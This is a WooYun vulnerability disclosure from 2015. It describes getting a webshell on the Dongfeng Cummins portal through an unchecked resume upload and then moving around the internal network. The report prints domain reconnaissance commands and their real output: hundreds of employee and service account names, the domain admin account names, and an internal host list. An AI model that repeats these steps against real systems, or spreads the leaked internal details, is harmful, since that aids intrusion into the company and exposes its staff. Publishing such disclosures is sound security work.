当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093515

漏洞标题:东风康明斯发动机有限公司门户网站某漏洞getshell至内网漫游

相关厂商:东风康明斯

漏洞作者: 爱上襄阳

提交时间:2015-01-23 17:36

修复时间:2015-03-09 17:38

公开时间:2015-03-09 17:38

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-23: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-09: 细节向公众公开

简要描述:

东风康明斯发动机有限公司门户网站某漏洞getshell至内网漫游

详细说明:

东风康明斯发动机门户网站

t013a186faeb552553d.png


职位申请,上传简历页面,未做服务器验证,改包上传

t01da08ec7c313a5cf7.png


获取到WEBSHELL

t01e73d8de4cc080f7c.png


t0135599aaf1373f30f.png


远程桌面连接至门户网站:

t01c0b5f943e8607c2e.png


漏洞证明:

网卡情况:
Windows IP Configuration
   Host Name . . . . . . . . . . . . : dcecssy057t
   Primary Dns Suffix  . . . . . . . : dcec.easia.cummins.com
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : dcec.easia.cummins.com
                                       easia.cummins.com
                                       cummins.com
Ethernet adapter 本地连接 2:
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Virtual Machine Bus Network Ada
pter #2
   Physical Address. . . . . . . . . : 00-15-5D-00-C9-34
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.113.57
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 192.168.112.1
   DNS Servers . . . . . . . . . . . : 192.168.112.26
                                       192.168.112.27


域用户列表:

net user /domain   域用户列表
这项请求将在域 dcec.easia.cummins.com 的域控制器处理。
\\DCECDC4.dcec.easia.cummins.com 的用户帐户
-------------------------------------------------------------------------------
0090ACA0-277D-491B-A     2A268D4E-D5DA-4840-9     4A3719B1-A67A-401F-9     
636801E5-CC48-4D96-A     67047B41-A430-44B9-8     6BBA8B4C-3A9B-4134-9     
932F26A5-8BFF-41FB-8     acsadmin                 admindept                
administrator            ASPNET                   atpuadmin                
Audit                    audit617                 avladmin                 
B4AD6363-9641-4435-8     baradm                   barvpn                   
bfcec                    BN147                    BN151                    
BN154                    BN156                    BN166                    
BP247                    BP249                    BP896                    
canway01                 CanwayTest               cba_anonymous            
ccaad                    ccanew                   ccauser                  
ccauser2                 ccauser3                 CDMS                     
CDMSU                    CE040                    CE455                    
CE959                    CF489                    CF873                    
cisconac                 CJ622                    CJ624                    
CJ697                    CL584                    CL626                    
CM024                    CM075                    CM101                    
CM426                    CM585                    CM962                    
CN052                    CN119                    CN120                    
cn121                    CN132                    CN546                    
CN549                    CN599                    CN600                    
CN833                    CO023                    CO467                    
CO842                    CO855                    CP456                    
CP527                    CP549                    CP648                    
CQ263                    CQ336                    CQ405                    
CQ406                    CQ452                    CQ467                    
CQ668                    CQ669                    CQ670                    
CQ712                    CR032                    CR228                    
CR289                    CR290                    CR291                    
CR387                    CR852                    crmadmin                 
crmmail                  CS122                    CS142                    
CS143                    CS221                    CS865                    
CT014                    CT046                    CT198                    
CT613                    CT629                    CT766                    
CT825                    CU619                    cummin5adm1n             
CV160                    CV161                    CV267                    
CW256                    CW477                    cwtest22                 
cwtest23                 cwtest24                 CX579                    
CX906                    CX909                    CX910                    
CX912                    CX913                    CX914                    
CX916                    CX918                    D5255984-3E7A-4E36-8     
DA828                    dadmin                   dadmin.app               
dadmin.gao               dbackup                  dbagent                  
dcecadmin                DCECCRM01                dcecedi                  
dceclyncssrs             dcecmcis                 dcecmonitor              
dcecnews                 dcecprint                dcecprint01              
dcecprint02              dcecprint03              dcecprint04              
dcecpublic               DCECSRMII                dcecssy041               
dcecsw                   df000                    DF044                    
DF149                    DF454                    DF477                    
df478                    df478a                   DF480                    
DF482                    DF483                    DF486                    
DF488                    DF495                    DF496                    
DF498                    DF499                    DF501                    
DF506                    DF507                    DF508                    
DF510                    DF511                    df516                    
DF520                    DF521                    DF523                    
DF524                    DF525                    DF533                    
DF537                    DF538                    DF539                    
DF540                    DF541                    df542                    
DF543                    DF544                    DF547                    
DF548                    DF549                    DF550                    
DF551                    DF552                    DF553                    
DF555                    DF556                    DF559                    
DF563                    DF565                    DF566                    
DF567                    DF570                    DF571                    
DF573                    DF574                    DF575                    
DF577                    DF578                    DF579                    
DF580                    DF582                    DF583                    
DF585                    DF587                    DF588                    
DF589                    DF590                    DF592                    
DF593                    DF647                    DF648                    
DF651                    DF652                    DF658                    
DF666                    DF669                    DF670                    
DF672                    DF673                    DF674                    
DF675                    DF677                    DG088                    
DG093                    DG096                    DG098                    
DG099                    DG100                    DG101                    
DG102                    DG103                    DG106                    
DG107                    DG114                    DG115                    
DG116                    DG117                    DG121                    
DG122                    DG123                    DG126                    
DG127                    DG131                    DG132                    
DG135                    DG136                    DG138                    
DG141                    DG146                    DG147                    
DG148                    DG150                    DG151                    
DG152                    DG155                    DG157                    
DG230                    DG377                    DG380                    
DG382                    DG385                    DG784                    
DG785                    DH374                    DH421                    
DH523                    DI276                    DI278                    
DI280                    DI283                    DI287                    
DI290                    DI296                    DI298                    
DI302                    DI303                    DI305                    
DI306                    DI308                    DI309                    
DI311                    DI312                    DI314                    
DI317                    DI318                    DI319                    
DI320                    DI321                    DI322                    
DI325                    DI326                    DI328                    
di329                    DI330                    DI331                    
DI332                    DI333                    DI334                    
DI335                    DI338                    DI339                    
DI341                    di343                    DI344                    
DI346                    DI348                    DI350                    
DI351                    DI352                    DI355                    
DI356                    DI359                    DI360                    
DI361                    DI362                    DI363                    
DI364                    DI366                    DI367                    
DI368                    DI369                    DI370                    
DI372                    DI377                    DI381                    
DI382                    DI384                    DI385                    
DI386                    DI388                    DI390                    
DI392                    DI396                    DI398                    
DI402                    DI403                    DI404                    
DI405                    DI408                    DI410                    
DI412                    DI413                    DI415                    
DI418                    DI422                    DI423                    
DI426                    DI428                    DI429                    
DI431                    DI432                    DI433                    
DI434                    DI435                    DI436                    
DI437                    DI438                    DI439                    
DJ606                    DK796                    DK885                    
Dk889                    DK890                    DKRHY                    
DL817                    DL818                    DL820                    
DL822                    DL824                    DL825                    
DL829                    Dpuser1                  dpuser2                  
dpuser3                  dpuser4                  DR545                    
DR547                    DR549                    DR550                    
DS833                    DS834                    DS835                    
DS836                    DS837                    DS838                    
DS839                    DS840                    DS841                    
DS852                    DS854                    DU117                    
DU118                    DU119                    DU122                    
DU124                    DU127                    DU129                    
DU130                    DU131                    DU133                    
DU134                    DU135                    DU136                    
E95A0DD6-ECF4-4474-A     EA507                    edi37                    
edi56                    EK167                    Elearn                   
ER990                    ES147                    ES148                    
ES368                    ES409                    ES410                    
ES475                    ES542                    ES543                    
ES754                    ES755                    ES757                    
ES758                    escreen                  ET201                    
ET257                    ET285                    ET286                    
ET287                    ET289                    ET290                    
ET291                    ET298                    ET311                    
ET313                    ET315                    ET316                    
ET317                    ET319                    ET320                    
ET384                    ET385                    ET386                    
ET387                    ET388                    ET398                    
ET402                    ET511                    ET529                    
ET536                    ET580                    ET581                    
ET600                    EU318                    EUQ_DCECSSY099           
EV086                    EV431                    EV848                    
EV891                    EV895                    EV901                    
EW053                    EW135                    EW153                    
EW196                    EW199                    EW313                    
EW478                    EW537                    EW540                    
EW555                    EW576                    EW634                    
EW675                    EW738                    EW739                    
EW758                    EW776                    EW790                    
EW795                    EW825                    EW838                    
EW839                    EW885                    EW897                    
EW906                    EW926                    EW938                    
EW950                    EW980                    ex198                    
EXO                      ext                      EY275                    
EY290                    EY501                    EY722                    
EY723                    EY804                    EZ138                    
EZ294                    EZ295                    EZ340                    
EZ595                    EZ596                    EZ628                    
EZ629                    F141AADA-DDB4-436E-A     F6D2D1F5-03BA-4968-9     
F877CCF6-4F9D-48C0-9     FA021                    FA022                    
FA140                    FA294                    FA745                    
FA818                    FA956                    fauser01                 
FB214                    FC023                    FC358                    
FC605                    FC606                    FC895                    
FE028                    FE031                    FE032                    
FE475                    Ff088                    fi736                    
fileadmin                fj591                    fj592                    
fj593                    fj595                    fj623                    
fj624                    fj625                    fj645                    
fj648                    fj893                    FK994                    
flyyoung                 FM181                    FM182                    
FM263                    FM268                    FM735                    
FN333                    fn509                    FO854                    
FO919                    FO995                    FP037                    
FP038                    FP443                    FP682                    
FP683                    FP895                    FP962                    
fq968                    FR174                    FV612                    
FV894                    FV956                    fx629                    
FY350                    fy901                    fy903                    
fy905                    fy906                    fy932                    
fy944                    fy946                    FZ880                    
FZ881                    ga399                    gettime                  
gf474                    GH294                    GI052                    
GJ457                    GJ458                    gl911                    
GL912                    GM870                    GM871                    
GN309                    GO652                    GO843                    
GO990                    GO992                    GP107                    
GP512                    GP513                    gptestuser               
GQ370                    guest251                 gv511                    
gw378                    gw634                    gw682                    
gw719                    gw760                    gw830                    
GWTAdmin                 GWTCW                    GWTkms001                
GWTkms002                GWTkms003                GWTkms004                
GWTkms005                GWTkms006                GWTkms007                
GWTkms008                GWTkms009                GWTkms010                
GWTkms011                GWTrfuser                HB685                    
hd966                    helpdesk                 hg560                    
hi221                    hj539                    hm731                    
hn518                    ho409                    ho470                    
ho539                    ho556                    HR Information-Check     
hrd001                   hrd002                   hrd003                   
hs004                    ht397                    hx429                    
hx866                    hx981                    hy100                    
hy645                    hy980                    ic778                    
ican                     ican1                    ie094                    
ig371                    ih666                    io415                    
iq951                    iq952                    ir293                    
ir294                    is154                    is175                    
is177                    is263                    is359                    
is759                    it158                    it318                    
it320                    it586                    ITControl                
iuser_dcecssy008         IUSR_DCECBDC1            IUSR_DCEC-EJT3J4XEB5     
IUSR_DCEC-O89MRJBHJ7     IUSR_DCECPDC             IUSR_DCECPDC1            
IUSR_DCECPDC2            IUSR_DCECPDC3            IUSR_DCECSSY093          
IUSR_DCEC-T94CI0BGBP     IUSR_DCEC-XNFPFYLZI0     IUSR_SERVER1             
iv066                    iv342                    iv784                    
iv829                    IWAM_DCECBDC1            IWAM_DCEC-EJT3J4XEB5     
IWAM_DCEC-O89MRJBHJ7     IWAM_DCECPDC             IWAM_DCECPDC1            
IWAM_DCECPDC2            IWAM_DCECPDC3            IWAM_DCECSSY093          
IWAM_DCEC-T94CI0BGBP     IWAM_DCEC-XNFPFYLZI0     IWAM_SERVER1             
ix470                    IY743                    iy745                    
IY888                    ja773                    jb060                    
jb205                    jb206                    jb208                    
jb230                    jc116                    jc323                    
jf166                    ji563                    ji564                    
jj885                    jk527                    jl441                    
jn302                    jn534                    jo446                    
jp325                    jq117                    jq122                    
ju088                    ju402                    ju406                    
ju520                    jv635                    JV795                    
JZ287                    JZ735                    JZ914                    
KA976                    KA978                    KC053                    
KC417                    KC427                    KC928                    
KC935                    KE320                    KE923                    
KF429                    KF430                    KF786                    
KH283                    KH286                    KI675                    
KI704                    KM543                    KM798                    
kn086                    KN824                    ko877                    
KO953                    KP234                    KQ571                    
KQ853                    kr106                    KR582                    
krbtgt                   KT589                    KT590                    
KT591                    KT592                    KT595                    
KT678                    KT679                    KT681                    
KT682                    KT684                    KT685                    
kt687                    KT688                    ku097                    
ku497                    kv714                    kv871                    
kv886                    KY656                    KZ158                    
KZ159                    KZ345                    kz773                    
kz775                    kz777                    kz989                    
kz990                    kz994                    LA044                    
la266                    LA270                    la734                    
la866                    la876                    la878                    
landesk                  landesk02                LC309                    
le326                    LF235                    LH179                    
LH889                    li967                    LJ013                    
LJ303                    lj673                    lj845                    
lk379                    lk380                    lk502                    
lk509                    ll960                    lo015                    
lo016                    lo017                    lo018                    
lo019                    lo020                    lo022                    
lo023                    lo024                    lo025                    
lo026                    lo027                    lo030                    
lo031                    lo032                    lo448                    
lo557                    ls582                    lu303                    
lv617                    lv957                    lw547                    
lw747                    lw753                    lw832                    
lyncuser                 ma172                    ma173                    
mail01                   mail02                   mail03                   
mail04                   mail05                   mailcluster              
mailtest                 mailtest1                maximo                   
mb557                    mb990                    md913                    
md915                    mdt2010                  me711                    
me712                    me898                    me899                    
me905                    me906                    me908                    
me909                    me910                    me911                    
me912                    me913                    me914                    
me915                    me916                    me917                    
me920                    me921                    me922                    
me923                    me924                    me929                    
mf015                    mf132                    mf267                    
mf273                    mf866                    MG01                     
mg137                    mi225                    mj795                    
mj796                    mks1                     mks2                     
ml696                    mn986                    mq392                    
mq393                    mq626                    MQV                      
mstech                   mu627                    mu628                    
mu629                    mu638                    mu639                    
mu640                    mu641                    mu642                    
mu643                    mu644                    mu645                    
mu650                    mu725                    mxadmin                  
nac001                   nac002                   nac003                   
nac004                   nac005                   nac006                   
nace                     oam                      OAMOBILE01               
OAMOBILE02               oauser                   OAuser01                 
OAuser02                 OAuser03                 OAzysj01                 
OAzysj02                 PD001                    PD002                    
PD003                    PD004                    PD005                    
ped1                     pfsmadmin                PFSMSYS                  
plmuser                  PMSAdmin                 POC                      
ppif                     ppif242                  projectservice           
QAD01                    QAD02                    QAD03                    
QAD04                    qad05                    qadadmin                 
qaduser                  QIS01                    qis02                    
qis03                    qisadmin                 qist                     
qistest                  remoteuser               reportadmin              
rfuser                   rmsadmin                 RMSSRVC                  
RoomA101                 RoomA115                 RoomA128                 
RoomA211                 RoomA237                 RoomA238                 
RoomA240                 RoomA241                 RoomA301                 
RoomA312                 RoomA325                 RoomA338                 
RoomB109                 RoomB222                 RoomC111                 
RoomC201                 RoomC217                 RoomC218                 
RoomMKS                  RoomPED301               RoomPED401               
RoomPUR                  RoomTraining01           RoomTraining02           
RTCArchivingService      RTCComponentService      RTCGuestAccessUser       
RTCService               sccm2012                 scvmm_service            
scvmm_sql                SinforAC                 SM_be3792c5d524441c9     
SM_cba9198633484e3ca     SM_fbec1968c24d45a18     SM_fe03e4cf4f9549258     
SMEX Administrator       smsadmin                 SMSClient_007            
smst                     SPC                      sp-wlm                   
SQLAdmin                 sqluser                  srmadmin                 
svrin                    swuser                   test001                  
Test01                   test02                   Test03                   
Test04                   test05                   test06                   
test07                   test1                    test123                  
testidc                  testmail                 testuser                 
TPL                      TPL1                     TPL2                     
TPL3                     TPL4                     TPL5                     
TPMTEST                  user01                   webuser                  
wluser1                  wluser2                  wluser3                  
wluser4                  wluser5_IT               wscreen                  
YZX_Supplier             Z270                     zy001                    
zy002                    zy003                    zy004                    
zy005                    zy006                    zy007                    
zy008                    zy009                    zy010                    
zy011                    zy012                    zy013                    
zy014                    zy015                    zy016                    
zy017                    zy018                    zy019                    
zy020                    zy021                    zy022                    
zy023                    zy024                    zy025                    
zy026                    zy027                    zy028                    
zy029                    zy030                    zy031                    
zy032                    zy033                    zy034                    
zy035                    zy036                    zy037                    
zy038                    zy039                    zy040                    
zy041                    zy042                    zy043                    
zy045                    zy046                    zy047                    
zy048                    zy049                    zy050                    
zy051                    zy052                    zy053                    
zy054                    zy055                    zy056                    
zy057                    zy058                    zy059                    
zy060                    zy061                    zy062                    
zy063                    zy064                    zy065                    
zy066                    zy067                    zy068                    
zy069                    zy070                    zy071                    
zy072                    zy073                    zy074                    
zy075                    zy076                    zy077                    
zy078                    zy079                    zy080                    
zy081                    zy082                    zy083                    
zy084                    zy085                    zy086                    
zy087                    zy088                    zy089                    
zy090                    zy091                    zy092                    
zy093                    zy094                    zy095                    
zy096                    zy097                    zy098                    
zy099                    zy100                    zy101                    
zy102                    zy103                    zy104                    
zy105                    zy106                    zy107                    
zy108                    zy109                    zy110                    
zy111                    zy112                    zy113                    
zy114                    zy115                    zy116                    
zy117                    zy118                    zz000                    
zz0000                   zz002                    ZZ003                    
ZZ005                    ZZ006                    ZZ007                    
zz008                    zz009                    zz011                    
zz012                    zz013                    ZZ017                    
ZZ018                    ZZ019                    zz021                    
zz023                    zz024                    zz027                    
zz030                    zz032                    zz039                    
zz040                    zz043                    zz044                    
zz045                    zz046                    zz047                    
zz048                    zz050                    zz052                    
zz053                    zz057                    zz058                    
zz061                    zz065                    zz066                    
zz067                    zz068                    zz072                    
zz073                    zz074                    zz075                    
zz076                    zz077                    zz078                    
zz079                    zz081                    zz083                    
zz084                    zz085                    zz090                    
zz092                    zz093                    zz094                    
zz095                    zz098                    zz100                    
zz101                    zz102                    zz103                    
zz104                    zz107                    zz108                    
zz109                    zz110                    zz111                    
zz119                    zz121                    zz123                    
zz125                    zz126                    zz127                    
zz136                    zz138                    zz139                    
zz140                    zz141                    zz142                    
zz143                    zz145                    zz146                    
zz147                    zz148                    zz149                    
zz150                    zz151                    zz154                    
zz155                    zz156                    zz157                    
zz159                    zz163                    zz164                    
zz165                    zz166                    zz169                    
zz170                    zz175                    zz176                    
zz178                    zz179                    zz180                    
zz183                    zz184                    zz185                    
zz186                    zz187                    zz188                    
zz189                    zz190                    zz191                    
zz192                    zz193                    zz194                    
zz195                    zz196                    zz197                    
zz198                    zz199                    zz201                    
zz202                    zz203                    zz205                    
zz206                    zz207                    zz211                    
zz212                    zz213                    zz215                    
zz217                    zz220                    zz221                    
zz223                    zz228                    zz229                    
zz230                    zz231                    zz234                    
zz235                    zz238                    zz241                    
zz243                    zz252                    zz253                    
zz254                    zz255                    zz256                    
zz257                    zz258                    zz259                    
zz260                    zz261                    zz262                    
zz264                    zz267                    zz268                    
zz272                    zz273                    zz274                    
zz275                    zz279                    zz280                    
zz281                    zz282                    zz283                    
zz284                    zz285                    zz289                    
zz290                    zz291                    zz292                    
zz293                    zz295                    zz296                    
zz297                    zz299                    zz300                    
zz302                    zz305                    zz306                    
zz307                    zz311                    zz312                    
zz313                    zz317                    zz319                    
zz328                    zz333                    zz335                    
zz336                    zz338                    zz339                    
zz340                    zz346                    zz351                    
zz361                    zz365                    zz366                    
zz368                    zz369                    zz370                    
zz375                    zz377                    zz386                    
zz387                    zz391                    zz396                    
zz397                    zz401                    zz405                    
zz406                    zz408                    ZZ411                    
zz412                    zz413                    zz415                    
zz418                    zz419                    zz430                    
zz431                    zz433                    zz436                    
zz437                    zz440                    zz441                    
zz442                    zz443                    zz445                    
zz447                    zz449                    zz450                    
zz451                    zz452                    zz453                    
zz454                    zz456                    zz457                    
zz458                    zz459                    zz460                    
zz461                    zz462                    zz463                    
zz464                    zz466                    zz467                    
zz468                    zz469                    zz470                    
zz471                    zz475                    zz476                    
zz478                    zz479                    zz480                    
zz482                    zz483                    zz484                    
zz487                    zz488                    zz489                    
zz490                    zz491                    zz493                    
zz494                    zz495                    zz496                    
zz497                    zz498                    zz500                    
zz501                    zz502                    zz503                    
zz504                    zz505                    zz506                    
zz507                    zz508                    zz509                    
zz510                    zz513                    zz515                    
zz520                    zz521                    zz528                    
zz530                    zz534                    zz535                    
zz546                    zz548                    zz551                    
zz554                    zz555                    zz556                    
zz557                    zz558                    zz559                    
zz560                    zz561                    zz562                    
zz565                    zz566                    zz568                    
zz570                    zz571                    zz573                    
zz576                    zz579                    zz584                    
zz585                    zz586                    zz588                    
zz589                    zz591                    zz592                    
zz593                    zz596                    zz597                    
zz598                    zz599                    zz600                    
zz604                    zz605                    zz606                    
zz610                    zz616                    zz617                    
zz618                    zz621                    zz623                    
zz626                    zz630                    zz631                    
zz634                    zz636                    zz636a                   
zz637                    zz638                    zz639                    
zz641                    zz642                    zz643                    
zz644                    zz646                    zz647                    
zz649                    zz651                    zz653                    
zz654                    zz656                    zz658                    
zz659                    zz661                    ZZ664                    
ZZ665                    ZZ666                    ZZ667                    
ZZ668                    zz668a                   ZZ669                    
ZZ670                    ZZ671                    ZZ672                    
ZZ674                    ZZ676                    ZZ678                    
ZZ679                    ZZ680                    ZZ681                    
ZZ682                    ZZ683                    ZZ684                    
ZZ685                    ZZ686                    ZZ687                    
ZZ690                    ZZ692                    ZZ694                    
ZZ696                    ZZ698                    ZZ699                    
ZZ700                    ZZ703                    ZZ705                    
ZZ707                    ZZ709                    ZZ712                    
ZZ714                    ZZ715                    ZZ720                    
ZZ722                    zz724                    zz725                    
zz726                    ZZ727                    ZZ729                    
zz731                    zz732                    ZZ733                    
ZZ734                    ZZ743                    ZZ744                    
ZZ745                    ZZ747                    ZZ748                    
ZZ749                    ZZ750                    ZZ753                    
ZZ754                    ZZ755                    ZZ760                    
ZZ762                    ZZ763                    ZZ764                    
ZZ767                    ZZ768                    ZZ776                    
ZZ778                    ZZ779                    ZZ780                    
ZZ781                    ZZ782                    ZZ783                    
ZZ784                    ZZ786                    ZZ787                    
ZZ788                    ZZ789                    ZZ790                    
ZZ791                    ZZ792                    ZZ796                    
ZZ799                    zz799a                   ZZ800                    
ZZ801                    ZZ802                    ZZ803                    
ZZ804                    ZZ805                    ZZ806                    
ZZ807                    ZZ809                    ZZ811                    
ZZ813                    ZZ814                    ZZ815                    
ZZ816                    ZZ817                    ZZ818                    
ZZ819                    ZZ820                    ZZ821                    
ZZ823                    ZZ824                    ZZ825                    
ZZ826                    ZZ827                    ZZ829                    
ZZ830                    ZZ831                    ZZ833                    
ZZ834                    ZZ835                    ZZ837                    
ZZ838                    ZZ839                    ZZ842                    
ZZ843                    zz843a                   ZZ844                    
ZZ845                    ZZ846                    ZZ847                    
ZZ848                    ZZ849                    ZZ850                    
ZZ851                    ZZ852                    ZZ854                    
ZZ855                    ZZ856                    ZZ858                    
ZZ859                    ZZ860                    ZZ861                    
ZZ862                    ZZ863                    ZZ864                    
ZZ865                    ZZ866                    ZZ867                    
ZZ868                    ZZ869                    ZZ870                    
zz871                    zz872                    zz873                    
zz874                    zz875                    zz876                    
zz877                    zz878                    zz879                    
zz880                    zz881                    zz882                    
zz883                    zz884                    zz885                    
zz886                    zz887                    zz888                    
zz889                    zz890                    zz891                    
zz892                    zz893                    zz895                    
zz896                    zz897                    zz898                    
ZZ899                    zz900                    zz901                    
zz903                    ZZ904                    ZZ905                    
ZZ906                    zz907                    zz908                    
zz909                    zz910                    zz912                    
zz913                    zz915                    zz916                    
zz917                    zz918                    zz920                    
zz921                    zz922                    zz923                    
zz924                    zz925                    zz926                    
zz927                    zz928                    zz929                    
zz930                    zz931                    zz932                    
zz933                    zz934                    zz935                    
zz936                    zz937                    zz938                    
zz939                    zz940                    zz941                    
zz942                    zz942a                   zz945                    
zz946                    zz947                    zz948                    
zz949                    zz950                    zz999                    
命令成功完成。


查看内网存在的域

C:\Documents and Settings\zz799>net view /domain
Domain
------------------------------------------------------
ATPU
DCEC
DCEC_ISBE
DCECSPC
MSHOME
SYSTECH
SYTECH
WORKGROUP
ZJSOFT
命令成功完成。


获取域管理员列表:

C:\Documents and Settings\zz799>net group "domain admins" /domain
这项请求将在域 dcec.easia.cummins.com 的域控制器处理。
组名     Domain Admins
注释     Designated administrators of the domain
成员
-------------------------------------------------------------------
ccaad                    cummin5adm1n             dadmin
dadmin.app               dadmin.gao               dcecadmin
mstech
命令成功完成。


列出内网计算机

C:\Documents and Settings\zz799>net view
服务器名称            注释
---------------------------------------------
\\ACS01
\\ACS02
\\APPSQL
\\CRMTEST
\\CRMTEST02
\\DATA
\\DCECBOBCAT_HOST
\\DCECCAS03
\\DCECCAS04
\\DCECDAG
\\DCECDC1
\\DCECDC2
\\DCECDC3
\\DCECDC4
\\DCECLIC
\\DCECLYNC01
\\DCECLYNC02
\\DCECLYNCARS
\\DCECLYNCDB01
\\DCECMBX01
\\DCECMBX02
\\DCECMX01             IBM Blade 2012 #1
\\DCECMX02             IBM Blade 2012 #2
\\DCECMX05
\\DCECODP
\\DCECRCA
\\DCECSCA
\\DCECSCOM
\\DCECSST009
\\DCECSST016BB
\\DCECSST043T
\\DCECSST044
\\DCECSST050
\\DCECSST053
\\DCECSST061
\\DCECSST067
\\DCECSST082
\\DCECSST149
\\DCECSST157
\\DCECSST158
\\DCECSST160
\\DCECSSY005
\\DCECSSY007
\\DCECSSY007N
\\DCECSSY009           dce
\\DCECSSY010
\\DCECSSY012
\\DCECSSY013W
\\DCECSSY014
\\DCECSSY015
\\DCECSSY016BB
\\DCECSSY017
\\DCECSSY020
\\DCECSSY021
\\DCECSSY022
\\DCECSSY023
\\DCECSSY032
\\DCECSSY032BB
\\DCECSSY033
\\DCECSSY037
\\DCECSSY038
\\DCECSSY042
\\DCECSSY043
\\DCECSSY045
\\DCECSSY046
\\DCECSSY054
\\DCECSSY055           PPTP VPN
\\DCECSSY057T
\\DCECSSY060
\\DCECSSY066
\\DCECSSY082
\\DCECSSY086
\\DCECSSY087
\\DCECSSY088
\\DCECSSY089
\\DCECSSY094
\\DCECSSY095
\\DCECSSY0A2
\\DCECSSY101
\\DCECSSY103
\\DCECSSY107
\\DCECSSY108
\\DCECSSY121
\\DCECSSY126
\\DCECSSY132
\\DCECSSY141
\\DCECSSY142
\\DCECSSY145
\\DCECSSY148
\\DCECSSY149
\\DCECSSY175
\\DCECSSY178
\\DCECSSY179
\\DCECSSYLOG           Dcecssylog
\\DCECSSYVG2           EMC-SNAS:T7.0.54.5
\\DCECTPM01
\\DCECTPM02
\\DCECTPM03
\\DCECUMS01
\\DCECVM
\\DCECVM01
\\DCECVM02
\\DCECVM04
\\DCECVMM2012
\\DCECWDP
\\DCX909R8P5GLP
\\DCX918FVL3H2X
\\DDG096R8P5GLV
\\DDI344R8P5GND
\\DDI408DX23H2X
\\DDK890JVL3H2X
\\DDS852PBWKKW6
\\DES757R8P5GHN
\\DET386R8N3WBY
\\DFC606R8N3WCH
\\DFM735PBWKKZ3
\\DGJ458CVL3H2X
\\DZY084R8N0YRT
\\DZY093R8P5GKF
\\DZY094R8N3WCB
\\DZZ019R8N9FMX
\\DZZ050R8N3WBW
\\DZZ052R8N3WAA
\\DZZ0538VL3H2X
\\DZZ067S07578036
\\DZZ090PBWKKZ8
\\DZZ092S07578026
\\DZZ098PBWKLC5
\\DZZ108R8N3WAH
\\DZZ279R8N0YRV
\\DZZ284R8P5GMN
\\DZZ415PBWKKV2
\\DZZ443R8P5GHX
\\DZZ445S07578022
\\DZZ488PBWKKY5
\\DZZ504R8N3VWM
\\DZZ508R8P5GMX
\\DZZ554PBWKLG0
\\DZZ5707133H2X
\\DZZ5962TL3H2X
\\DZZ597R8N3VYW
\\DZZ617PBWKKY0
\\DZZ670R8N3WBZ
\\DZZ826R8N9FMN
\\DZZ843PBWKLC0
\\DZZ848R8N3VYY
\\DZZ860R8P5GML
\\DZZ889R8N3VXP
\\DZZ926PBWKLA8
\\DZZ935R8N3VZB
\\DZZ945R8N3VYG
\\EATPUDP
\\ISDE_OP10
\\LCN121P11E7E3
\\LDG127P11CBMT
\\LDI402P16DX47
\\LEW906P11CBR5
\\LKU497P11CBPX
\\LZY011PBL2H6P
\\LZY036P11CP3M
\\LZZ011P16DX3W
\\LZZ272P11E7D8
\\LZZ377P11CBNM
\\LZZ412P16DX39
\\LZZ74717B0RM1
\\LZZ847P16DX1W
\\MDT2010
\\METS
\\NASDS1
\\PRINTER
\\QADTEMP
\\SCCM2012
\\SCDPM2012
\\SQL01
\\SQL02
\\SQLCLU01
\\T-PBK64PT
\\T-PBWKLE9
\\VCENTER
\\WSUS2012
\\XCECWARRANTY         xcecwarranty
命令成功完成。


通过某种方式获取到域控管理员账号密码,任意登录漫游内网

t01e65a1f81481e38de.png


登录CRM系统,如上图所示,相关敏感信息:

t01b8d8b4b445861f09.png


修复方案:

边界漏洞导致内网被渗透,可任意漫游,厂商尽快修补,敏感信息太多。

版权声明:转载请注明来源 爱上襄阳@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-28 10:25

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-15 16:26 | 雏鹰 ( 路人 | Rank:2 漏洞数:1 | 关注互联网的那些事、关注web安全、关注安...)

    学习了,webshell后,如何开启远程桌面。